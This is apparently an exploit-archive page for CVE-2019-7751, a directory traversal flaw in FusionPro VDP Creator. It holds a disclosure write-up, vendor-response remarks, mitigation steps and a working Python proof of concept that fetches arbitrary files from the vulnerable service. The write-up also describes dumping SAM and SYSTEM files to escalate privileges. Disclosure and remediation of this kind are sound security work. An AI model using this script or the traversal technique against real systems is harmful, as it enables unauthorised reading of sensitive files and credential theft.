exploit the possibilities

MarcomCentral FusionPro VDP Creator Directory Traversal

MarcomCentral FusionPro VDP Creator Directory Traversal
Posted Mar 5, 2019
Authored by 0v3rride

MarcomCentral FusionPro VDP Creator versions prior to 10.0 suffer from a directory traversal vulnerability.

tags | exploit, file inclusion
advisories | CVE-2019-7751
MD5 | 06756d818f5cc3711574cae6adb8815a

MarcomCentral FusionPro VDP Creator Directory Traversal

Change Mirror Download
#!/usr/bin/env python

'''
# Exploit Title: MarcomCentral FusionPro VDP Creator < 10.0 - Directory Traversal
# Date: 02/11/2019
# Exploit Author: 0v3rride
# Vendor Homepage: https://marcom.com/
# Software Link: http://static.pti.com/downloads/FusionPro/Win32/FusionPro_9.3.36_Setup.exe
# Version: < 10.0 (version tested was 9.3)
# Executable/Service: FPProducerInternetServer.exe v9.03.0036.0000 (FusionPro Internet Request Handler)
# Tested on: Windows
# CVE : 2019-7751

Summary
A directory traversal and local file inclusion vulnerability in the FPProducerInternetServer.exe service/utility in Ricoh MarcomCentral's, formerly PTI Marketing, FusionPro VDP Creator allows a remote attacker to list or enumerate sensitive contents of files. Furthermore, this could allow for privilege escalation by dumping the local machine's SAM and SYSTEM database files, access to common files that contain plaintext credentials, and possibly remote code execution.

Attack Details
Exploiting this vulnerability is extremely simple. This could be done from a browser like Firefox. Simply navigate the affected host (e.g. <http://><host.domain.tld>:<port#>/Windows/System32/drivers/etc/hosts. No slash-dot-dots (/../..) are required, but you can add some if you want. Note that the slashes are forward slashes! By default, the service sets up a listener on port 8080.

Vendor Response
The response I've received from the vendor suggests that they care very little about the issue despite the criticality of this class of vulnerability. I'll quote the vendors response, "just delete it". Delete what exactly? Uninstall FusionPro VDP Creator? Or should one just delete FPProducerInternetServer.exe? The vendor also wasn't clear if any of the more current versions (10.0 and 10.1) are affected. All that was sent was, "since v9.3 there have been changes to this utility to restrict access to folders". It is possible that these versions are also susceptible to the issue as well based on the response from the vendor.

Resolution
Thankfully I found some better solutions other than "just delete it".

Open services.msc
Look for the service named FusionPro Internet Request Handler
Right-click and open the properties Window
Stop the service if it's running
Select disabled startup type

Or you could write a PowerShell script that does it automatically for you using the set-service and get-service cmdlets.

The nuclear option would be deleting the following executable, C:\Windows\SysWOW64\FPProducerInternetServer.exe. However, I don't know what affect this will have on the machine and FusionPro VDP Creator software. You could take a gamble and upgrade to the latest version .
'''

#######################
# PoC by: 0v3rride #
# DoC: February 2019 #
#######################

from requests import *
from sys import *;


def travel(fullurl):
r = get(fullurl);
print("-" * 80 + "\n[i]: Supplied URL: {}".format(fullurl))
print("-" * 80 + "\n[i]: Response Status Code: {}".format(r.status_code));
print("-" * 80 + "\n[i]: Response Headers:\n");

for hdr in r.headers:
print("{}: {}".format(hdr, r.headers[hdr]));

print("-" * 80 + "\n[i]: RAW DATA RETURNED FROM RESPONSE: \n{}".format(r.text));


if len(argv) < 3:
print("[i]: Usage -- ./poc <http(s)://FQDN or http(s)://<IP address>:<Port #> <file to query on the local machine that is affected (e.g. /windows/system32/drivers/etc/hosts)");
print("[i]: Path needs to start with a '/'.");
else:
try:
print("[i]: https://github.com/0v3rride/");
print("-" * 80 + "\n[!] Sending the request...");
travel(argv[1] + argv[2]);
except RequestException as re:
print(re.strerror);
finally:
print("-" * 80 + "\n[!] Done!");
Login or Register to add favorites

File Archive:

January 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    4 Files
  • 2
    Jan 2nd
    3 Files
  • 3
    Jan 3rd
    3 Files
  • 4
    Jan 4th
    33 Files
  • 5
    Jan 5th
    31 Files
  • 6
    Jan 6th
    21 Files
  • 7
    Jan 7th
    15 Files
  • 8
    Jan 8th
    19 Files
  • 9
    Jan 9th
    1 Files
  • 10
    Jan 10th
    1 Files
  • 11
    Jan 11th
    33 Files
  • 12
    Jan 12th
    19 Files
  • 13
    Jan 13th
    27 Files
  • 14
    Jan 14th
    8 Files
  • 15
    Jan 15th
    16 Files
  • 16
    Jan 16th
    1 Files
  • 17
    Jan 17th
    2 Files
  • 18
    Jan 18th
    20 Files
  • 19
    Jan 19th
    32 Files
  • 20
    Jan 20th
    15 Files
  • 21
    Jan 21st
    10 Files
  • 22
    Jan 22nd
    16 Files
  • 23
    Jan 23rd
    1 Files
  • 24
    Jan 24th
    1 Files
  • 25
    Jan 25th
    36 Files
  • 26
    Jan 26th
    26 Files
  • 27
    Jan 27th
    28 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close